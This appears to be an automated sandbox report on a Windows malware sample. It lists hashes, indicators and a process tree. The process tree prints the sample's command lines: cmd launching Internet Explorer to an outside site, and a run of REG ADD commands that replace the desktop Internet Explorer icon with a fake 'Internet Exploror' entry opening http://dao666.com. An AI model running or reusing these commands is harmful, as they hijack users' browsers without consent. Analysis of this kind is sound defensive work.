Analysis
-
max time kernel
95s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
19/09/2022, 10:03
Static task
static1
Behavioral task
behavioral1
Sample
2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
Resource
win10v2004-20220901-en
General
-
Target
2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe
-
Size
111KB
-
MD5
fbe6959908821fa3ea09c4f324c46c00
-
SHA1
a0ac296fb482f6be9b47a4428e94f0b87851b0f3
-
SHA256
2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83
-
SHA512
5ffc516bfdba36b88cbc9558625dde31457258c99d9ff3869e9727601e7065b55588f82007fbcc53ebb2da37673dae07744ce32bdbfb42fc896d68b8c78370c0
-
SSDEEP
3072:WwxVMhOC/dTDbq91+mno3t4QZQ3rAHsifl:WTfFDbRnOTrAMY
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops file in Program Files directory 8 IoCs
description ioc Process File created C:\Program Files\WindWare\winare.vbs cmd.exe File opened for modification C:\Program Files\WindWare\winare.vbs cmd.exe File created C:\Program Files\WindWare\361.cmd cmd.exe File opened for modification C:\Program Files\WindWare\361.cmd cmd.exe File created C:\Program Files\WindWare\is.cmd cmd.exe File opened for modification C:\Program Files\WindWare\is.cmd cmd.exe File created C:\Program Files\WindWare\to.cmd cmd.exe File opened for modification C:\Program Files\WindWare\to.cmd cmd.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Mail\UltraEdlt\is.cmd cmd.exe File opened for modification C:\Windows\Mail\UltraEdlt\is.cmd cmd.exe File created C:\Windows\Mail\UltraEdlt\winare.vbs cmd.exe File opened for modification C:\Windows\Mail\UltraEdlt\winare.vbs cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5096 sc.exe 3368 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "630821889" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0003c52737ccd801 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370363981" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985271" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30985271" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "618789924" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "618789924" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985271" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000926f48011db5d0d1228815e050117de0214fad061a08be12c355377e9b1bd381000000000e80000000020000200000004a73de3198c1a0e96e2dec760682159e797ff218901a06c8c106dd70477fc424200000006c76ee7edac398cb9f8fe595545a19d1f648c176f0c90b4ceb4ba8cbe7f97ef240000000d6ad43b9a20228d5b3a36e7ded3284a8978d38f0d779a3df16377e08f7f45111c70f814985d69e00b63be16f25cefd0b424e47ee51066a67d6cdb1d2e194b65a iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000cccbd34b70b6e059f41f10fdb1ccd372046289459d5be82ad3511710eb2ec1cb000000000e800000000200002000000084d22d91f43bfed325a4796211172651d792cf7ba90aafa65c9cff8f8efda2cb200000004097ceb824d7e02c5065b3a03710e8b21f0e3e2ee21d7c4efdaeaba8749400d840000000e3fbcf5bac1aa141d9c3e0cf47beed90b0ab17e538cfc04d44bc63b1bdcd49035f427755c35fccf1aca7083aa173951f3e227d1ac9d6e14b08ce1fdc94f54e48 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{5062FD18-382A-11ED-A0EE-7A46CE8ECE48} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b08be12737ccd801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Modifies registry class 45 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" reg.exe -
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1212 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1212 iexplore.exe 1212 iexplore.exe 3548 IEXPLORE.EXE 3548 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3932 wrote to memory of 3464 3932 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe 84 PID 3932 wrote to memory of 3464 3932 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe 84 PID 3932 wrote to memory of 3464 3932 2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe 84 PID 3464 wrote to memory of 4844 3464 WScript.exe 85 PID 3464 wrote to memory of 4844 3464 WScript.exe 85 PID 3464 wrote to memory of 4844 3464 WScript.exe 85 PID 4844 wrote to memory of 1212 4844 cmd.exe 87 PID 4844 wrote to memory of 1212 4844 cmd.exe 87 PID 3464 wrote to memory of 1552 3464 WScript.exe 89 PID 3464 wrote to memory of 1552 3464 WScript.exe 89 PID 3464 wrote to memory of 1552 3464 WScript.exe 89 PID 1552 wrote to memory of 4996 1552 cmd.exe 91 PID 1552 wrote to memory of 4996 1552 cmd.exe 91 PID 1552 wrote to memory of 4996 1552 cmd.exe 91 PID 1552 wrote to memory of 1960 1552 cmd.exe 92 PID 1552 wrote to memory of 1960 1552 cmd.exe 92 PID 1552 wrote to memory of 1960 1552 cmd.exe 92 PID 1212 wrote to memory of 3548 1212 iexplore.exe 93 PID 1212 wrote to memory of 3548 1212 iexplore.exe 93 PID 1212 wrote to memory of 3548 1212 iexplore.exe 93 PID 1552 wrote to memory of 5088 1552 cmd.exe 94 PID 1552 wrote to memory of 5088 1552 cmd.exe 94 PID 1552 wrote to memory of 5088 1552 cmd.exe 94 PID 1552 wrote to memory of 1772 1552 cmd.exe 95 PID 1552 wrote to memory of 1772 1552 cmd.exe 95 PID 1552 wrote to memory of 1772 1552 cmd.exe 95 PID 1552 wrote to memory of 4212 1552 cmd.exe 96 PID 1552 wrote to memory of 4212 1552 cmd.exe 96 PID 1552 wrote to memory of 4212 1552 cmd.exe 96 PID 1552 wrote to memory of 4448 1552 cmd.exe 97 PID 1552 wrote to memory of 4448 1552 cmd.exe 97 PID 1552 wrote to memory of 4448 1552 cmd.exe 97 PID 1552 wrote to memory of 4968 1552 cmd.exe 98 PID 1552 wrote to memory of 4968 1552 cmd.exe 98 PID 1552 wrote to memory of 4968 1552 cmd.exe 98 PID 1552 wrote to memory of 636 1552 cmd.exe 99 PID 1552 wrote to memory of 636 1552 cmd.exe 99 PID 1552 wrote to memory of 636 1552 cmd.exe 99 PID 1552 wrote to memory of 3120 1552 cmd.exe 100 PID 1552 wrote to memory of 3120 1552 cmd.exe 100 PID 1552 wrote to memory of 3120 1552 cmd.exe 100 PID 1552 wrote to memory of 2456 1552 cmd.exe 101 PID 1552 wrote to memory of 2456 1552 cmd.exe 101 PID 1552 wrote to memory of 2456 1552 cmd.exe 101 PID 1552 wrote to memory of 2960 1552 cmd.exe 102 PID 1552 wrote to memory of 2960 1552 cmd.exe 102 PID 1552 wrote to memory of 2960 1552 cmd.exe 102 PID 1552 wrote to memory of 2684 1552 cmd.exe 103 PID 1552 wrote to memory of 2684 1552 cmd.exe 103 PID 1552 wrote to memory of 2684 1552 cmd.exe 103 PID 1552 wrote to memory of 2200 1552 cmd.exe 104 PID 1552 wrote to memory of 2200 1552 cmd.exe 104 PID 1552 wrote to memory of 2200 1552 cmd.exe 104 PID 1552 wrote to memory of 2260 1552 cmd.exe 105 PID 1552 wrote to memory of 2260 1552 cmd.exe 105 PID 1552 wrote to memory of 2260 1552 cmd.exe 105 PID 1552 wrote to memory of 2700 1552 cmd.exe 106 PID 1552 wrote to memory of 2700 1552 cmd.exe 106 PID 1552 wrote to memory of 2700 1552 cmd.exe 106 PID 1552 wrote to memory of 3888 1552 cmd.exe 107 PID 1552 wrote to memory of 3888 1552 cmd.exe 107 PID 1552 wrote to memory of 3888 1552 cmd.exe 107 PID 1552 wrote to memory of 5004 1552 cmd.exe 108 PID 1552 wrote to memory of 5004 1552 cmd.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe"C:\Users\Admin\AppData\Local\Temp\2d1c8e84b1f35198e75b62517ff6dfa22358e435b11f0278585b5e6ed7999c83.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\51dd.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C start /min iexplore http://447.cc/index2.html?51dd3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://447.cc/index2.html?51dd4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1212 CREDAT:17410 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3548
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\to.cmd3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f4⤵PID:4996
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵
- Modifies registry class
PID:1960
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f4⤵
- Modifies registry class
PID:5088
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f4⤵
- Modifies registry class
PID:1772
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"4⤵
- Modifies registry class
PID:4212
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f4⤵
- Modifies registry class
PID:4448
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"4⤵
- Modifies registry class
PID:4968
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f4⤵
- Modifies registry class
PID:636
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f4⤵
- Modifies registry class
PID:3120
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"4⤵
- Modifies registry class
PID:2456
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f4⤵
- Modifies registry class
PID:2960
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"4⤵
- Modifies registry class
PID:2684
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f4⤵
- Modifies registry class
PID:2200
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"4⤵
- Modifies registry class
PID:2260
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f4⤵
- Modifies registry class
PID:2700
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"4⤵
- Modifies registry class
PID:3888
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"4⤵
- Modifies registry class
PID:5004
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f4⤵
- Modifies registry class
PID:4960
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"4⤵
- Modifies registry class
PID:3568
-
-
